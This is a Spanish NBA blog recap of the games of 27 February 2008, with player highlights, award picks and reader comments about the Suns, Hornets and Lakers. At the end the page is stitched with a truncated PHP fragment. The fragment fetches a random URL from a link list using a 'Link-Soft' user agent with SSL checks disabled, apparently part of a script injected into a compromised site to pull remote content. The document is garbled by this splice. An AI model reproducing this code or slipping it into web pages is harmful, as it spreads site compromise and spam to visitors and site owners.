La crónica (27/02/08)

28 de February de 2008 por MagicJohnson32

La pasada noche dio mucho de sí, con varios enfrentamientos directos en la zona alta, otros entre equipos que luchan por entrar en los Playoffs, el estallido ofensivo de los Nuggets, la exhibición de Bibby ante sus ex compañeros… Empezamos con el vídeo de resumen de estos encuentros y pasamos a contaros a continuación todo lo ocurrido.

La crónica:

lbjamesgarnett

Calderón tiene motivos para estar preocupado. Suma cuarto partidos consecutivos sin superar las 7 asistencias (algo que sólo le había sucedido una vez en toda la temporada) y TJ Ford va recuperando terreno y protagonismo en el juego a su costa. Los Raptors, sin embargo, no se ven afectados por ello y lograron su tercer triunfo consecutivo al vencer 85-107 a los Wolves en un partido con protagonismo de Bosh y Jefferson. El equipo canadiense, cuarto del Este, toma un partido de ventaja sobre los Cavs, que cayeron en Boston por 87-92. Cleveland pagó la discreta noche de LeBron, quien sólo anotó 7 de sus 24 lanzamientos. Un porcentaje similar firmó Szczerbiak (3 de 13), mientras que Delonte West fue el mejor de los Cavs con 20 puntos y 8 de 13 en tiros. Para los Celtics resultó determinante la efectividad de Ray Allen, Perkins y Powe, autores de 15 de 19 en tiros.

iversongelabaleCon este triunfo, Boston amplía a 3 su ventaja sobre los Pistons al frente del Este, ya que los de Detroit perdieron por sexta ocasión consecutiva ante los Jazz. Y eso que los Pistons acumularon una ventaja de 15 puntos durante la primera parte, de la mano de Billups y Hamilton, que acabaron con 21 y 22 puntos respectivamente. Pero los Jazz reaccionaron en la segunda mitad con un parcial de 42-61 para vencer 95-103 gracias a un impecable Millsap y a Okur, principal verdugo de su ex equipo. A 2.5 partidos de los Jazz en la NorthWest Division se mantienen los Nuggets, que ofrecieron la mayor explosión anotadora de la actual temporada: un 67% en tiros de campo y todos sus jugadores, un total de 10, con al menos un 50% de acierto en tiros para imponerse por 138-96. La víctima fueron unos derrotados Sonics, que concedieron innumerables canastas fáciles, algo de lo que se beneficiaron especialmente Kenyon Martin, con 11 de 14 en tiros, y Allen Iverson, con 13 de 18. Por parte de los Sonics merece de nuevo ser destacado Gelabale, que tras ser recuperado de la D-League está ofreciendo un buen nivel y anoche fue de nuevo el máximo anotador de su equipo con 16 puntos. Los Nuggets quedan a sólo medio partido de la octava plaza que ocupan los Warriors.jjumpshotsacto

En similar situación están los Hawks, a los que Mike Bibby, motivadísimo ante su ex equipo, condujo al triunfo con 24 puntos, 12 asistencias y 5 rebotes. Joe Johnson logró 26 puntos, Childress 25 y Horford su habitual doble-doble, mientras que por los Kings destacaron Udrih y Miller, con 25 puntos cada uno, y Artest, con 23. Los Hawks vencieron 117-123 y reducen a un partido la distancia con respecto a los Nets, octavo clasificado. Apenas medio partido por encima y en séptima posición se situaron los Sixers, que vencieron 89-101 a los Magic gracias al grandísimo rendimiento de su trío exterior, Miller, Green e Iguodala: entre los tres sumaron 76 puntos y 21 asistencias. Por los Magic brilló su trío particular, Howard, Lewis y Turkoglu.

Y dos partidos por debajo de la octava plaza del Este se encuentran los Bulls, que ante los Pacers ganaron por 113-107 su primer partido desde el megatrade y lo logró, precisamente, gracias fundamentalmente a los 29 puntos de Larry Hughes, llegado de los Cavs en ese traspaso. También destacó Gooden con 10 puntos y 15 rebotes, así como Deng, que, en su segundo partido como titular tras la lesión, logró 16 puntos, 6 rebotes y 5 asistencias. Por los Pacers, que siguen en caída libre, Dunleavy y Diener superaron los 20 puntos y Murphy se quedó en 19.

Muy lejos de la lucha por los Playoffs, los Knicks vencieron con mucha claridad, 89-113, a unos Bobcats cada vez más decepcionantes. Robinson y Crawford volvieron a comandar el ataque neoyorkino, Lee puso la intensidad y el trabajo, y por parte de Charlotte destacaron los dobles-dobles de Mohammed y Okafor, así como los 19 puntos con 8 de 11 en tiros de Carroll. En otro partido entre equipos alejados de las plazas de Playoffs, shaqchandlerfallpero que resultó mucho más igualado, los Blazers ganaron 82-80 a los Clippers y evitaron que, por tercera ocasión consecutiva, el rival les remontase una ventaja de más de 15 puntos (como les ocurrió ante Celtics y Lakers). Anoche los Clippers remontaron pero Portland reaccionó a tiempo, con 13 puntos de Jack en el último cuarto, para llevarse el triunfo. Maggette con 32 puntos y Tim Thomas con 21-11 fueron los mejores de los angelinos.

Por último, en el partido más interesante de la madrugada, los Hornets ganaron a los Suns por 103-120 en un enfrentamiento entre dos de los candidatos al trono del Oeste. Chris Paul volvió a exhibirse con 25 puntos y 15 asistencias (por los 8 puntos con 1 de 6 en tiros y 13 asistencias de Nash), Chandler pudo con Shaq, y Amare y David West protagonizaron un espectacular duelo de PF’s con 32-14-4-4 del primero y 27-4-2 del segundo. Pargo añadió 22 puntos desde el banco. Así, Hornets y Suns quedan a 1.5 partidos del liderato de la Conferencia Oeste, que ocupan los Lakers.

Nuestro MVP: no sólo condujo a los Hornets a un triunfo esencial ante los Suns con 25 puntos, 15 asistencias y 6 rebotes; además de eso,cp3suns Chris Paul dominó a Steve Nash, al que dejó en una sola canasta en juego en todo el partido. CP3 sigue haciendo puntos para el galardón de jugador más valioso de la temporada.

El rookie: 16 puntos, 14 rebotes, 4 asistencias, 6 de 8 en tiros de campo y 4 de 4 en libres. Al Horford es un reloj y un candidato muy serio al RoY.

La sorpresa: 22 puntos y 9 asistencias de Travis Diener suponen la principal sorpresa de la noche, aunque resulta muy agradable ver a Mike Bibby brillar como en sus mejores días.

La decepción: deberíamos conceder a este apartado el nombre de Premio Eddy Curry, quien anoche se quedó sin anotar en el triunfo de los Knicks sobre los Bobcats. El premio colectivo se lo llevan los Sonics, que permitieron 138 puntos con un intolerable 67% de acierto de su rival, los Nuggets.

La canción del día: Inauguramos sección a lo grande. Inspirados por la actualidad de la NBA, pondremos alguna canción que, de un modo u otro, esté relacionada con ella. Y empezamos con una de las mejores canciones del año pasado, todo un himno con trazas de clásico obra del gran Mark Lanegan en su magnífico disco junto a Soulsavers “It’s Not How Far You Fall, It’s The Way You Land“. Se trata de “Revival”, y es que no hace falta más que ver qué equipos lideran las dos conferencias para llevar a cabo un ejercicio de revivalismo.

“Revival”Soulsavers, Mark Lanegan & Lakers vs Celtics

Finalizamos con las 10 mejores acciones de la noche:

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    A dia de hoy los Suns parecen estar un paso por detras de equipos como Lakers, Spurs o New Orleans ¿no? Mientras los otros jugadores importantes que han cambiado de equipo(Gasol, Kidd, Bibby) parecen haberse adaptado sin problemas, a los Suns les cuesta carburar con Shaq.

    Los Hawks salvo a Detroit y Celtics, podrian darle un susto a cualquiera.

      Citar

  2. MagicJohnson32 dice:
    #2

    El traspaso de Marion por Shaq ha puesto a los Suns en una situación muy delicada. No puedes afrontar los Playoffs con tantos interrogantes, dudas, cuestiones sobre tu estilo de juego. ¿Qué papel le das a O’Neal? ¿Qué ha de hacer Nash, correr como siempre o templar el juego? Además, tienen un equipo de 7 jugadores, con Nash y Shaq en los 34 y 35 años, más Bell con 31. Han perdido al único gran defensor que tenían (lo de Raja no cuela). Sufrirán en el back-court ante Paul o Kobe o Deron o Iverson; sufrirán en la pintura ante Duncan, Boozer, Pau & Bynum o el que sea; y sin Marion, sufrirán para frenar al SF de turno. No sé, están a tiempo de darle la vuelta a la situación pero ahora mismo son un desastre.

    Sobre los Hornets, si consiguen que Bonzi y Mike James aporten como rotación, sí serán un rival serio. Si no, con 4 jugadores no podrán llegar muy lejos.

    Los Spurs son los Spurs hasta en año par. Y los Lakers están como para ser muy optimista, pero necesitan que la rotación mantenga este gran nivel. Añadir a un buen Bynum ya sería la leche.

      Citar

  3. telekoman dice:
    #3

    La gran incógnita para Lakers es saber como va a volver Bynum. A Hornets yo no les daría mucha bola en estos playoffs, más que nada por el tema de la inexperiencia. Es posible que pasen la primera ronda, siempre que se metan entre los 4 primeros y el cruce no sea maligno. Ahora, el año que viene, a poquito que se muevan y hagan algo de banquillo, yo los apunto a Finales del Oeste.

      Citar

  4. MagicJohnson32 dice:
    #4

    Yo, sinceramente, veo a Lakers con opciones incluso sin Bynum. Evidentemente, si Drew regresa y se acerca al nivel que tenía cuando se tronchó, Lakers se convertiría en el favorito del Oeste.

    Siempre, insisto, que el banquillo siga con este nivelazo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>